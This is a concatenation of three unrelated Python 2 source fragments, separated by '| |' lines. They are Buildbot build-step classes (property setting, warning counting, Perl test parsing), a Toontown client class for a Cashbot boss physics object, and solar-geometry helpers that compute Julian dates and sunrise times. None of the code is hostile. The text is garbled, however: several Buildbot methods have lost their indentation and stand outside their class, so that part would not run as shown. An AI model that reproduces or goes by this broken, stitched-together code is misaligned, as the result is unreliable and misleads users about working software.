    def __init__(self, property=None, extract_fn=None, strip=True, **kwargs):
        self.property = property
        self.extract_fn = extract_fn
        self.strip = strip

        if not ((property is not None) ^ (extract_fn is not None)):
            config.error(
                "Exactly one of property and extract_fn must be set")

        ShellCommand.__init__(self, **kwargs)

        # accumulated {name: value} of properties this step has set
        self.property_changes = {}

    def commandComplete(self, cmd):
        if self.property:
            if cmd.didFail():
                return
            result = cmd.logs['stdio'].getText()
            if self.strip: result = result.strip()
            propname = self.property
            self.setProperty(propname, result, "SetProperty Step")
            self.property_changes[propname] = result
        else:
            # local renamed from `log`, which shadowed twisted.python.log
            stdio_log = cmd.logs['stdio']
            new_props = self.extract_fn(cmd.rc,
                    ''.join(stdio_log.getChunks([STDOUT], onlyText=True)),
                    ''.join(stdio_log.getChunks([STDERR], onlyText=True)))
            for k, v in new_props.items():
                self.setProperty(k, v, "SetProperty Step")
            self.property_changes = new_props

    def createSummary(self, log):
        # `log` parameter name is part of the LoggingBuildStep interface.
        if self.property_changes:
            props_set = [ "%s: %r" % (k, v)
                          for k, v in self.property_changes.items() ]
            self.addCompleteLog('property changes', "\n".join(props_set))

    def getText(self, cmd, results):
        if len(self.property_changes) > 1:
            return [ "%d properties set" % len(self.property_changes) ]
        elif len(self.property_changes) == 1:
            # Python 2: dict.keys() returns a list, so indexing is valid.
            return [ "property '%s' set" % self.property_changes.keys()[0] ]
        else:
            # let ShellCommand describe
            return ShellCommand.getText(self, cmd, results)
# Backwards-compatible alias; importing it warns via twisted's deprecation
# machinery.
SetProperty = SetPropertyFromCommand
deprecatedModuleAttribute(Version("Buildbot", 0, 8, 8),
        "It has been renamed to SetPropertyFromCommand",
        "buildbot.steps.shell", "SetProperty")
class Configure(ShellCommand):
    """Run ./configure; any failure halts and flunks the build."""
    name = "configure"
    haltOnFailure = 1
    flunkOnFailure = 1
    description = ["configuring"]
    descriptionDone = ["configure"]
    command = ["./configure"]
class StringFileWriter(pb.Referenceable):
    """A pb FileWriter that accumulates received data in memory.

    Lets the master pull a file up from the slave for inline processing
    instead of writing it to disk; the content ends up in `self.buffer`.
    """
    def __init__(self):
        self.buffer = ""

    def remote_write(self, data):
        self.buffer = self.buffer + data

    def remote_close(self):
        # nothing to release; the buffer stays available after close
        pass
class WarningCountingShellCommand(ShellCommand):
    # NOTE(review): class continues beyond this excerpt.
    renderables = [ 'suppressionFile' ]

    # running total of matched (unsuppressed) warnings
    warnCount = 0
    # regex applied to every output line to detect a warning
    warningPattern = '.*warning[: ].*'
    # The defaults work for GNU Make.
    directoryEnterPattern = (u"make.*: Entering directory "
                             u"[\u2019\"`'](.*)[\u2019'`\"]")
    directoryLeavePattern = "make.*: Leaving directory"
    # optional slave-side file of suppression rules, fetched in start()
    suppressionFile = None

    # suppression-file syntax: blank lines / '#' comments are skipped;
    # other lines are "FILE-RE : WARN-RE [: START[-END]]"
    commentEmptyLineRe = re.compile(r"^\s*(\#.*)?$")
    suppressionLineRe = re.compile(r"^\s*(.+?)\s*:\s*(.+?)\s*(?:[:]\s*([0-9]+)(?:-([0-9]+))?\s*)?$")
    def __init__(self,
                 warningPattern=None, warningExtractor=None, maxWarnCount=None,
                 directoryEnterPattern=None, directoryLeavePattern=None,
                 suppressionFile=None, **kwargs):
        # See if we've been given a regular expression to use to match
        # warnings. If not, use a default that assumes any line with "warning"
        # present is a warning. This may lead to false positives in some cases.
        #
        # Constructor args override the class-attribute defaults only when
        # truthy, so subclasses may still customize via class attributes.
        if warningPattern:
            self.warningPattern = warningPattern
        if directoryEnterPattern:
            self.directoryEnterPattern = directoryEnterPattern
        if directoryLeavePattern:
            self.directoryLeavePattern = directoryLeavePattern
        if suppressionFile:
            self.suppressionFile = suppressionFile
        if warningExtractor:
            self.warningExtractor = warningExtractor
        else:
            # default: keep the whole line, no file/line attribution
            self.warningExtractor = WarningCountingShellCommand.warnExtractWholeLine
        self.maxWarnCount = maxWarnCount

        # And upcall to let the base class do its work
        ShellCommand.__init__(self, **kwargs)

        # (fileRe, warnRe, start, end) tuples; see addSuppression()
        self.suppressions = []
        # directories entered via directoryEnterPattern, for file attribution
        self.directoryStack = []
def addSuppression(self, suppressionList):
"""
This method can be used to add patters of warnings that should
not be counted.
It takes a single argument, a list of patterns.
Each pattern is a 4-tuple (FILE-RE, WARN-RE, START, END).
FILE-RE is a regular expression (string or compiled regexp), or None.
If None, the pattern matches all files, else only files matching the
regexp. If directoryEnterPattern is specified in the class constructor,
matching is against the full path name, eg. src/main.c.
WARN-RE is similarly a regular expression matched against the
text of the warning, or None to match all warnings.
START and END form an inclusive line number range to match against. If
START is None, there is no lower bound, similarly if END is none there
is no upper bound."""
for fileRe, warnRe, start, end in suppressionList:
if fileRe != None and isinstance(fileRe, basestring):
fileRe = re.compile(fileRe)
if warnRe != None and isinstance(warnRe, basestring):
warnRe = re.compile(warnRe)
self.suppressions.append((fileRe, warnRe, start, end))
def warnExtractWholeLine(self, line, match):
"""
Extract warning text as the whole line.
No file names or line numbers."""
return (None, None, line)
def warnExtractFromRegexpGroups(self, line, match):
"""
Extract file name, line number, and warning text as groups (1,2,3)
of warningPattern match."""
file = match.group(1)
lineNo = match.group(2)
if lineNo != None:
lineNo = int(lineNo)
text = match.group(3)
return (file, lineNo, text)
    def maybeAddWarning(self, warnings, line, match):
        """Record `line` as a warning unless a suppression rule matches.

        A suppression applies only when ALL of its configured parts match
        (file regex, warning-text regex, line-number range); the first
        applicable suppression discards the warning.
        """
        if self.suppressions:
            (file, lineNo, text) = self.warningExtractor(self, line, match)
            lineNo = lineNo and int(lineNo)

            if file != None and file != "" and self.directoryStack:
                # attribute the file to the directory we are currently in
                currentDirectory = '/'.join(self.directoryStack)
                if currentDirectory != None and currentDirectory != "":
                    file = "%s/%s" % (currentDirectory, file)

            # Skip adding the warning if any suppression matches.
            for fileRe, warnRe, start, end in self.suppressions:
                if not (file == None or fileRe == None or fileRe.match(file)):
                    continue
                if not (warnRe == None or warnRe.search(text)):
                    continue
                if not ((start == None and end == None) or
                        (lineNo != None and start <= lineNo and end >= lineNo)):
                    continue
                return

        warnings.append(line)
        self.warnCount += 1
    def start(self):
        """Fetch the suppression file from the slave (if configured) before
        running the command; otherwise start immediately."""
        if self.suppressionFile == None:
            return ShellCommand.start(self)

        # download the suppression file into an in-memory buffer; the
        # command proper is started from uploadDone()
        self.myFileWriter = StringFileWriter()

        args = {
            'slavesrc': self.suppressionFile,
            'workdir': self.getWorkdir(),
            'writer': self.myFileWriter,
            'maxsize': None,
            'blocksize': 32*1024,
            }
        cmd = buildstep.RemoteCommand('uploadFile', args, ignore_updates=True)
        d = self.runCommand(cmd)
        d.addCallback(self.uploadDone)
        d.addErrback(self.failed)
def uploadDone(self, dummy):
    """Parse the uploaded suppression file, then start the command.

    Each non-comment line is matched against suppressionLineRe; the
    captured (file, test, start, end) tuples are registered via
    addSuppression() before the shell command proper is started.
    When only a start line is given, end defaults to start.
    """
    lines = self.myFileWriter.buffer.split("\n")
    del self.myFileWriter
    # Renamed from 'list' to avoid shadowing the builtin.
    suppressions = []
    for line in lines:
        if self.commentEmptyLineRe.match(line):
            continue
        match = self.suppressionLineRe.match(line)
        if match:
            file, test, start, end = match.groups()
            if end is not None:
                end = int(end)
            if start is not None:
                start = int(start)
                if end is None:
                    end = start
            suppressions.append((file, test, start, end))
    self.addSuppression(suppressions)
    return ShellCommand.start(self)
def createSummary(self, log):
    """
    Match log lines against warningPattern.

    Warnings are collected into another log for this step, and the
    build-wide 'warnings-count' is updated."""
    self.warnCount = 0
    # Now compile a regular expression from whichever warning pattern we're
    # using
    wre = self.warningPattern
    if isinstance(wre, str):
        wre = re.compile(wre)
    directoryEnterRe = self.directoryEnterPattern
    if (directoryEnterRe != None
            and isinstance(directoryEnterRe, basestring)):
        directoryEnterRe = re.compile(directoryEnterRe)
    directoryLeaveRe = self.directoryLeavePattern
    if (directoryLeaveRe != None
            and isinstance(directoryLeaveRe, basestring)):
        directoryLeaveRe = re.compile(directoryLeaveRe)
    # Check if each line in the output from this command matched our
    # warnings regular expressions. If did, bump the warnings count and
    # add the line to the collection of lines with warnings
    warnings = []
    # TODO: use log.readlines(), except we need to decide about stdout vs
    # stderr
    for line in log.getText().split("\n"):
        # Maintain the directory stack so warnings can be attributed to
        # the file's full path in maybeAddWarning().
        if directoryEnterRe:
            match = directoryEnterRe.search(line)
            if match:
                self.directoryStack.append(match.group(1))
                continue
        if (directoryLeaveRe and
                self.directoryStack and
                directoryLeaveRe.search(line)):
            self.directoryStack.pop()
            continue
        match = wre.match(line)
        if match:
            self.maybeAddWarning(warnings, line, match)
    # If there were any warnings, make the log if lines with warnings
    # available
    if self.warnCount:
        self.addCompleteLog("warnings (%d)" % self.warnCount,
                            "\n".join(warnings) + "\n")
    # Accumulate into the step statistic and the build-wide property.
    warnings_stat = self.step_status.getStatistic('warnings', 0)
    self.step_status.setStatistic('warnings', warnings_stat + self.warnCount)
    old_count = self.getProperty("warnings-count", 0)
    self.setProperty("warnings-count", old_count + self.warnCount, "WarningCountingShellCommand")
def evaluateCommand(self, cmd):
    """Map the command result onto FAILURE / WARNINGS / SUCCESS.

    The step fails if the command itself failed, or if the warning count
    exceeded maxWarnCount (when configured); otherwise any warnings
    downgrade SUCCESS to WARNINGS.
    """
    # Split the original compound condition for readability; behavior is
    # unchanged. 'is not None' replaces '!= None' (maxWarnCount is an
    # int or None).
    if cmd.didFail():
        return FAILURE
    if self.maxWarnCount is not None and self.warnCount > self.maxWarnCount:
        return FAILURE
    if self.warnCount:
        return WARNINGS
    return SUCCESS
class Compile(WarningCountingShellCommand):
    """Standard compile step: runs "make all" and counts compiler warnings.

    Failure halts and flunks the build; subclass or override 'command'
    for other build systems.
    """
    name = "compile"
    haltOnFailure = 1
    flunkOnFailure = 1
    description = ["compiling"]
    descriptionDone = ["compile"]
    command = ["make", "all"]
class Test(WarningCountingShellCommand):
    """Generic "make test" step.

    Subclasses report results via setTestResults(); describe() then
    appends the accumulated totals to the step description once done.
    """
    name = "test"
    warnOnFailure = 1
    description = ["testing"]
    descriptionDone = ["test"]
    command = ["make", "test"]

    def setTestResults(self, total=0, failed=0, passed=0, warnings=0):
        """
        Called by subclasses to set the relevant statistics; this actually
        adds to any statistics already present
        """
        total += self.step_status.getStatistic('tests-total', 0)
        self.step_status.setStatistic('tests-total', total)
        failed += self.step_status.getStatistic('tests-failed', 0)
        self.step_status.setStatistic('tests-failed', failed)
        warnings += self.step_status.getStatistic('tests-warnings', 0)
        self.step_status.setStatistic('tests-warnings', warnings)
        passed += self.step_status.getStatistic('tests-passed', 0)
        self.step_status.setStatistic('tests-passed', passed)

    def describe(self, done=False):
        """Return the step description, appending test totals once done."""
        description = WarningCountingShellCommand.describe(self, done)
        if done:
            description = description[:]  # make a private copy
            if self.step_status.hasStatistic('tests-total'):
                total = self.step_status.getStatistic("tests-total", 0)
                failed = self.step_status.getStatistic("tests-failed", 0)
                passed = self.step_status.getStatistic("tests-passed", 0)
                warnings = self.step_status.getStatistic("tests-warnings", 0)
                if not total:
                    # Some reporters only set the individual counts.
                    total = failed + passed + warnings
                if total:
                    description.append('%d tests' % total)
                if passed:
                    description.append('%d passed' % passed)
                if warnings:
                    description.append('%d warnings' % warnings)
                if failed:
                    description.append('%d failed' % failed)
        return description
class PerlModuleTest(Test):
    """Run a Perl test suite with 'prove' and parse Test::Harness output.

    Supports both the newer Test::Harness format (with a "Test Summary
    Report" section) and the older one-line summary format.

    NOTE: this code relies on Python 2 semantics — map() must return a
    list for the 'in' / index() / del-slice operations below.
    """
    command = ["prove", "--lib", "lib", "-r", "t"]
    total = 0

    def evaluateCommand(self, cmd):
        """Derive SUCCESS/WARNINGS/FAILURE and test counts from stdio."""
        # Get stdio, stripping pesky newlines etc.
        lines = map(
            lambda line: line.replace('\r\n', '').replace('\r', '').replace('\n', ''),
            self.getLog('stdio').readlines()
        )
        total = 0
        passed = 0
        failed = 0
        rc = SUCCESS
        if cmd.didFail():
            rc = FAILURE
        # New version of Test::Harness?
        if "Test Summary Report" in lines:
            # Drop everything up to (and including) the report header and
            # the dashed separator line that follows it.
            test_summary_report_index = lines.index("Test Summary Report")
            del lines[0:test_summary_report_index + 2]
            # The stray '\)' matches the close-paren of the
            # "(Wstat: ... Tests: ... Failed: N)" summary line.
            re_test_result = re.compile("^Result: (PASS|FAIL)$|Tests: \d+ Failed: (\d+)\)|Files=\d+, Tests=(\d+)")
            mos = map(lambda line: re_test_result.search(line), lines)
            test_result_lines = [mo.groups() for mo in mos if mo]
            for line in test_result_lines:
                if line[0] == 'FAIL':
                    rc = FAILURE
                if line[1]:
                    failed += int(line[1])
                if line[2]:
                    total = int(line[2])
        else:  # Nope, it's the old version
            re_test_result = re.compile("^(All tests successful)|(\d+)/(\d+) subtests failed|Files=\d+, Tests=(\d+),")
            mos = map(lambda line: re_test_result.search(line), lines)
            test_result_lines = [mo.groups() for mo in mos if mo]
            if test_result_lines:
                test_result_line = test_result_lines[0]
                success = test_result_line[0]
                if success:
                    failed = 0
                    # NOTE(review): assumes a second matched line carries
                    # the totals; an IndexError is possible if it is
                    # missing — confirm against real harness output.
                    test_totals_line = test_result_lines[1]
                    total_str = test_totals_line[3]
                else:
                    failed_str = test_result_line[1]
                    failed = int(failed_str)
                    total_str = test_result_line[2]
                    rc = FAILURE
                total = int(total_str)
        warnings = 0
        if self.warningPattern:
            wre = self.warningPattern
            if isinstance(wre, str):
                wre = re.compile(wre)
            warnings = len([l for l in lines if wre.search(l)])
            # Because there are two paths that are used to determine
            # the success/fail result, I have to modify it here if
            # there were warnings.
            if rc == SUCCESS and warnings:
                rc = WARNINGS
        if total:
            passed = total - failed
        self.setTestResults(total=total, failed=failed, passed=passed,
                            warnings=warnings)
        return rc
| |
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.directnotify import DirectNotifyGlobal
from direct.distributed import DistributedSmoothNode
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from direct.fsm import FSM
from direct.task import Task
smileyDoId = 1
class DistributedCashbotBossObject(DistributedSmoothNode.DistributedSmoothNode, FSM.FSM):
    """Client-side representation of a grabbable/droppable physics object
    in the Cashbot boss battle (Python 2 / Panda3D).

    FSM states: Off, LocalGrabbed, Grabbed, LocalDropped, Dropped,
    SlidingFloor, Free.  The 'Local*' states are entered speculatively by
    the local client before the AI confirms (or rejects) the interaction.
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedCashbotBossObject')
    # When true, a task watches the sliding object and requests the
    # 'Free' state once it has (almost) stopped moving.
    wantsWatchDrift = 1

    def __init__(self, cr):
        DistributedSmoothNode.DistributedSmoothNode.__init__(self, cr)
        FSM.FSM.__init__(self, 'DistributedCashbotBossObject')
        self.boss = None
        self.avId = 0      # avatar currently interacting with the object
        self.craneId = 0   # crane currently holding/last holding the object
        self.cleanedUp = 0
        self.collisionNode = CollisionNode('object')
        self.collisionNode.setIntoCollideMask(ToontownGlobals.PieBitmask | OTPGlobals.WallBitmask | ToontownGlobals.CashbotBossObjectBitmask | OTPGlobals.CameraBitmask)
        self.collisionNode.setFromCollideMask(ToontownGlobals.PieBitmask | OTPGlobals.FloorBitmask)
        self.collisionNodePath = NodePath(self.collisionNode)
        self.physicsActivated = 0
        # Sound intervals; the first two start as empty Sequences and are
        # presumably replaced by subclasses — TODO confirm.
        self.toMagnetSoundInterval = Sequence()
        self.hitFloorSoundInterval = Sequence()
        self.hitBossSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_safe_miss.ogg')
        self.hitBossSoundInterval = SoundInterval(self.hitBossSfx)
        self.touchedBossSfx = loader.loadSfx('phase_5/audio/sfx/AA_drop_sandbag.ogg')
        self.touchedBossSoundInterval = SoundInterval(self.touchedBossSfx, duration=0.8)
        self.lerpInterval = None
        return

    def disable(self):
        self.cleanup()
        self.stopSmooth()
        DistributedSmoothNode.DistributedSmoothNode.disable(self)

    def cleanup(self):
        """Idempotent teardown: finish intervals and drop references."""
        if self.cleanedUp:
            return
        else:
            self.cleanedUp = 1
        self.demand('Off')
        self.detachNode()
        self.toMagnetSoundInterval.finish()
        self.hitFloorSoundInterval.finish()
        self.hitBossSoundInterval.finish()
        self.touchedBossSoundInterval.finish()
        del self.toMagnetSoundInterval
        del self.hitFloorSoundInterval
        del self.hitBossSoundInterval
        del self.touchedBossSoundInterval
        self.boss = None
        return

    def setupPhysics(self, name):
        """Wrap this node in an ActorNode and register collision handling."""
        an = ActorNode('%s-%s' % (name, self.doId))
        anp = NodePath(an)
        if not self.isEmpty():
            self.reparentTo(anp)
        # Re-point this NodePath at the new physics node.
        NodePath.assign(self, anp)
        self.physicsObject = an.getPhysicsObject()
        self.setTag('object', str(self.doId))
        self.collisionNodePath.reparentTo(self)
        self.handler = PhysicsCollisionHandler()
        self.handler.addCollider(self.collisionNodePath, self)
        self.collideName = self.uniqueName('collide')
        self.handler.addInPattern(self.collideName + '-%in')
        self.handler.addAgainPattern(self.collideName + '-%in')
        self.watchDriftName = self.uniqueName('watchDrift')

    def activatePhysics(self):
        """Attach to the boss physics manager and listen for collisions."""
        if not self.physicsActivated:
            self.boss.physicsMgr.attachPhysicalNode(self.node())
            base.cTrav.addCollider(self.collisionNodePath, self.handler)
            self.physicsActivated = 1
            self.accept(self.collideName + '-floor', self.__hitFloor)
            self.accept(self.collideName + '-goon', self.__hitGoon)
            self.acceptOnce(self.collideName + '-headTarget', self.__hitBoss)
            self.accept(self.collideName + '-dropPlane', self.__hitDropPlane)

    def deactivatePhysics(self):
        """Inverse of activatePhysics()."""
        if self.physicsActivated:
            self.boss.physicsMgr.removePhysicalNode(self.node())
            base.cTrav.removeCollider(self.collisionNodePath)
            self.physicsActivated = 0
            self.ignore(self.collideName + '-floor')
            self.ignore(self.collideName + '-goon')
            self.ignore(self.collideName + '-headTarget')
            self.ignore(self.collideName + '-dropPlane')

    def hideShadows(self):
        # Hook for subclasses with drop shadows.
        pass

    def showShadows(self):
        # Hook for subclasses with drop shadows.
        pass

    def stashCollisions(self):
        self.collisionNodePath.stash()

    def unstashCollisions(self):
        self.collisionNodePath.unstash()

    def __hitFloor(self, entry):
        if self.state == 'Dropped' or self.state == 'LocalDropped':
            self.d_hitFloor()
            self.demand('SlidingFloor', localAvatar.doId)

    def __hitGoon(self, entry):
        if self.state == 'Dropped' or self.state == 'LocalDropped':
            goonId = int(entry.getIntoNodePath().getNetTag('doId'))
            goon = self.cr.doId2do.get(goonId)
            if goon:
                self.doHitGoon(goon)

    def doHitGoon(self, goon):
        # Hook for subclasses; called when the falling object lands on a goon.
        pass

    def __hitBoss(self, entry):
        # Only count a hit when we dropped it from a crane other than the
        # boss itself.
        if (self.state == 'Dropped' or self.state == 'LocalDropped') and self.craneId != self.boss.doId:
            vel = self.physicsObject.getVelocity()
            vel = self.crane.root.getRelativeVector(render, vel)
            vel.normalize()
            # Impact is the velocity component along the crane's Y axis.
            impact = vel[1]
            if impact >= self.getMinImpact():
                print 'hit! %s' % impact
                self.hitBossSoundInterval.start()
                self.doHitBoss(impact)
            else:
                self.touchedBossSoundInterval.start()
                print '--not hard enough: %s' % impact

    def doHitBoss(self, impact):
        self.d_hitBoss(impact)

    def __hitDropPlane(self, entry):
        self.notify.info('%s fell out of the world.' % self.doId)
        self.fellOut()

    def fellOut(self):
        # Subclasses must respawn/recover the object.
        raise StandardError, 'fellOut unimplented'

    def getMinImpact(self):
        # Minimum impact speed for a hit to register; subclasses override.
        return 0

    def __watchDrift(self, task):
        """Task: request the Free state once horizontal motion stops."""
        v = self.physicsObject.getVelocity()
        if abs(v[0]) < 0.0001 and abs(v[1]) < 0.0001:
            self.d_requestFree()
            self.demand('Free')
        return Task.cont

    def prepareGrab(self):
        # Hook for subclasses, called before a crane grabs the object.
        pass

    def prepareRelease(self):
        # Hook for subclasses, called before a crane releases the object.
        pass

    def setBossCogId(self, bossCogId):
        self.bossCogId = bossCogId
        self.boss = base.cr.doId2do[bossCogId]

    def setObjectState(self, state, avId, craneId):
        """Distributed update: the AI broadcast a new object state."""
        if state == 'G':
            self.demand('Grabbed', avId, craneId)
        elif state == 'D':
            if self.state != 'Dropped':
                self.demand('Dropped', avId, craneId)
        elif state == 's':
            if self.state != 'SlidingFloor':
                self.demand('SlidingFloor', avId)
        elif state == 'F':
            self.demand('Free')
        else:
            self.notify.error('Invalid state from AI: %s' % state)

    def d_requestGrab(self):
        self.sendUpdate('requestGrab')

    def rejectGrab(self):
        # The AI refused our speculative grab; fall back to dropping.
        if self.state == 'LocalGrabbed':
            self.demand('LocalDropped', self.avId, self.craneId)

    def d_requestDrop(self):
        self.sendUpdate('requestDrop')

    def d_hitFloor(self):
        self.sendUpdate('hitFloor')

    def d_requestFree(self):
        self.sendUpdate('requestFree', [self.getX(),
                                        self.getY(),
                                        self.getZ(),
                                        self.getH()])

    def d_hitBoss(self, impact):
        self.sendUpdate('hitBoss', [impact])

    def defaultFilter(self, request, args):
        # No transitions are allowed until the boss reference is set.
        if self.boss == None:
            raise FSM.RequestDenied, request
        return FSM.FSM.defaultFilter(self, request, args)

    def enterOff(self):
        self.detachNode()
        if self.lerpInterval:
            self.lerpInterval.finish()
            self.lerpInterval = None
        return

    def exitOff(self):
        self.reparentTo(render)

    def enterLocalGrabbed(self, avId, craneId):
        # Speculative grab by the local avatar, pending AI confirmation.
        self.avId = avId
        self.craneId = craneId
        self.crane = self.cr.doId2do.get(craneId)
        self.hideShadows()
        self.prepareGrab()
        self.crane.grabObject(self)

    def exitLocalGrabbed(self):
        # If the AI confirmed (-> Grabbed) keep holding; otherwise release.
        if self.newState != 'Grabbed':
            self.crane.dropObject(self)
            self.prepareRelease()
            del self.crane
            self.showShadows()

    def enterGrabbed(self, avId, craneId):
        if self.oldState == 'LocalGrabbed':
            if craneId == self.craneId:
                # AI confirmed our own speculative grab; nothing to redo.
                return
            else:
                # Someone else won the race; let go first.
                self.crane.dropObject(self)
                self.prepareRelease()
        self.avId = avId
        self.craneId = craneId
        self.crane = self.cr.doId2do.get(craneId)
        self.hideShadows()
        self.prepareGrab()
        self.crane.grabObject(self)

    def exitGrabbed(self):
        self.crane.dropObject(self)
        self.prepareRelease()
        self.showShadows()
        del self.crane

    def enterLocalDropped(self, avId, craneId):
        # Speculative drop by the local avatar: simulate physics locally.
        self.avId = avId
        self.craneId = craneId
        self.crane = self.cr.doId2do.get(craneId)
        self.activatePhysics()
        self.startPosHprBroadcast()
        self.hideShadows()
        # Frictionless while airborne.
        self.handler.setStaticFrictionCoef(0)
        self.handler.setDynamicFrictionCoef(0)

    def exitLocalDropped(self):
        if self.newState != 'SlidingFloor' and self.newState != 'Dropped':
            self.deactivatePhysics()
            self.stopPosHprBroadcast()
        del self.crane
        self.showShadows()

    def enterDropped(self, avId, craneId):
        self.avId = avId
        self.craneId = craneId
        self.crane = self.cr.doId2do.get(craneId)
        if self.avId == base.localAvatar.doId:
            # We own the drop: run physics and broadcast our position.
            self.activatePhysics()
            self.startPosHprBroadcast()
            self.handler.setStaticFrictionCoef(0)
            self.handler.setDynamicFrictionCoef(0)
        else:
            # Someone else owns it: smooth toward their broadcasts.
            self.startSmooth()
        self.hideShadows()

    def exitDropped(self):
        if self.avId == base.localAvatar.doId:
            if self.newState != 'SlidingFloor':
                self.deactivatePhysics()
                self.stopPosHprBroadcast()
        else:
            self.stopSmooth()
        del self.crane
        self.showShadows()

    def enterSlidingFloor(self, avId):
        self.avId = avId
        if self.lerpInterval:
            self.lerpInterval.finish()
            self.lerpInterval = None
        if self.avId == base.localAvatar.doId:
            self.activatePhysics()
            self.startPosHprBroadcast()
            # Floor friction while sliding.
            self.handler.setStaticFrictionCoef(0.9)
            self.handler.setDynamicFrictionCoef(0.5)
            if self.wantsWatchDrift:
                taskMgr.add(self.__watchDrift, self.watchDriftName)
        else:
            self.startSmooth()
        self.hitFloorSoundInterval.start()
        return

    def exitSlidingFloor(self):
        if self.avId == base.localAvatar.doId:
            taskMgr.remove(self.watchDriftName)
            self.deactivatePhysics()
            self.stopPosHprBroadcast()
        else:
            self.stopSmooth()

    def enterFree(self):
        # Object is at rest and unowned.
        self.avId = 0
        self.craneId = 0

    def exitFree(self):
        pass
| |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Jun 1 15:32:10 2017
@author: mschull
"""
import numpy as np
import math
from astropy.convolution import convolve
from astropy.convolution import Gaussian2DKernel, Box2DKernel
# script imports
# imports
def to_jd(datetime):
    """Convert a datetime object to a (fractional) Julian date.

    Algorithm copied from https://en.wikipedia.org/wiki/Julian_day;
    variable names (a, y, m, jdn) follow the notation on that page.

    Parameters
    ----------
    datetime : datetime.datetime
        Timestamp to convert (treated as-is; no timezone handling).

    Returns
    -------
    jd : float
        Julian date including the fractional day.
    """
    # Keep the (module-shadowing) parameter name for backward
    # compatibility with keyword callers; alias it locally.
    dt = datetime
    a = math.floor((14. - dt.month) / 12.)
    y = dt.year + 4800. - a
    m = dt.month + 12. * a - 3.
    # Julian day number at noon of the civil date.
    jdn = (dt.day + math.floor((153. * m + 2.) / 5.) + 365. * y
           + math.floor(y / 4.) - math.floor(y / 100.)
           + math.floor(y / 400.) - 32045.)
    # Add the time of day; the Julian day starts at noon, hence the
    # -12 hour offset.
    jd = (jdn + (dt.hour - 12.) / 24. + dt.minute / 1440.
          + dt.second / 86400. + dt.microsecond / 86400000000.)
    return jd
# ;
# ; PROCEDURE: SUNSET_SUNRISE
# ;
# ; CALLED BY: DISALEXI (found at end of file)
# ;
# ; PURPOSE:
# ; Computes solar time variables following Campbell & Norman 1998
# ;
# ;======================================================================================================
# PRO sunset_sunrise, julian, lon, lat, time_t
#
# COMMON com_time, t_rise, t_end, zs
def sunset_sunrise(dt, lon, lat, time_t):
    """Solar time variables following Campbell & Norman 1998.

    Parameters
    ----------
    dt : datetime
        Date/time used to derive the Julian date.
    lon, lat : numpy arrays
        Longitude/latitude in radians (np.rad2deg is applied below;
        the boolean-mask assignments require array inputs).
    time_t : float
        Observation time in hours.

    Returns
    -------
    t_rise, t_end : sunrise and sunset times [hours].
    zs : solar zenith angle [radians].
    """
    julian = to_jd(dt)
    # Sunrise time
    julian_ = julian + (time_t / 24.)
    # Julian centuries since J2000 (epoch 2451545.0).
    j_cen = ((julian_ + 0.5 - 2451545.) / 36525.)
    # NOTE(review): '%' binds tighter than '+', so the mod-360 applies only
    # to the j_cen term (and then 360 is subtracted) — confirm against the
    # NOAA solar calculator formulation for the sun's mean longitude.
    lon_sun = (280.46646 + j_cen * (36000.76983 + j_cen * 0.0003032) % 360.) - 360.
    an_sun = 357.52911 + j_cen * (35999.05029 - 0.0001537 * j_cen)  # mean anomaly [deg]
    ecc = 0.016708634 - j_cen * (0.000042037 + 0.0000001267 * j_cen)  # orbit eccentricity
    # Mean obliquity of the ecliptic [deg], then corrected for nutation.
    ob_ecl = 23. + (26. + ((21.448 - j_cen * (46.815 + j_cen * (0.00059 - j_cen * 0.001813)))) / 60.) / 60.
    ob_corr = ob_ecl + 0.00256 * np.cos(np.deg2rad(125.04 - 1934.136 * j_cen))
    var_y = np.tan(np.deg2rad(ob_corr / 2.)) * np.tan(np.deg2rad(ob_corr / 2.))
    # Equation of time [minutes].
    eq_t = 4. * np.rad2deg(var_y * np.sin(np.deg2rad(2. * lon_sun)) - 2. * ecc * np.sin(np.deg2rad(an_sun))
                           + 4. * ecc * var_y * np.sin(np.deg2rad(an_sun)) * np.cos(
        np.deg2rad(2. * lon_sun)) - 0.5 * var_y *
                           var_y * np.sin(np.deg2rad(4. * lon_sun)) - 1.25 * ecc * ecc * np.sin(np.deg2rad(2 * an_sun)))
    # Equation of the center, true and apparent solar longitude [deg].
    sun_eq = np.sin(np.deg2rad(an_sun)) * (1.914602 - j_cen * (0.004817 + 0.000014 * j_cen)) + \
        np.sin(np.deg2rad(2. * an_sun)) * (0.019993 - 0.000101 * j_cen) + np.sin(
        np.deg2rad(3. * an_sun)) * 0.000289
    sun_true = sun_eq + lon_sun
    sun_app = sun_true - 0.00569 - 0.00478 * np.sin(np.deg2rad((125.04 - 1934.136 * j_cen)))
    # Solar declination [deg].
    d = np.rad2deg((np.arcsin(np.sin(np.deg2rad(ob_corr)) * np.sin(np.deg2rad(sun_app)))))
    # Sunrise/sunset hour angle [deg]; 90.833 deg accounts for refraction
    # and the solar disc radius.
    ha_t = np.rad2deg(np.arccos(
        np.cos(np.deg2rad(90.833)) / (np.cos(lat) * np.cos(np.deg2rad(d))) - np.tan(lat) * np.tan(np.deg2rad(d))))
    t_noon = (720. - 4. * np.rad2deg(lon) - eq_t) / 1440. * 24.
    t_rise = ((t_noon / 24.) - (ha_t * 4. / 1440.)) * 24.
    t_end = ((t_noon / 24.) + (ha_t * 4. / 1440.)) * 24.
    # True solar time [minutes], wrapped into one day.
    ts_time = ((time_t / 24. * 1440 + eq_t + 4. * np.rad2deg(lon)) % 1440.)
    ts_time[ts_time > 1440.] = ts_time[ts_time > 1440.] - 1440.
    # Hour angle w [deg]: negative before solar noon, positive after.
    w = ts_time / 4. + 180.
    w[ts_time / 4. >= 0] = ts_time[ts_time / 4. >= 0.] / 4. - 180.
    # Solar zenith angle [radians].
    zs = np.arccos(
        (np.sin(lat) * np.sin(np.deg2rad(d))) + (np.cos(lat) * np.cos(np.deg2rad(d)) * np.cos(np.deg2rad(w))))
    return t_rise, t_end, zs
# PRO albedo_separation, albedo, Rs_1, F, fc, aleafv, aleafn, aleafl, adeadv, adeadn, adeadl, z, t_air, zs, control
#
# COMMON com_alb, Rs_c, Rs_s, albedo_c, albedo_s, e_atm, rsoilv_itr, fg_itr
#
# ;*******************************************************************************************************************
# ; Compute Solar Components and atmospheric properties (Campbell & Norman 1998)
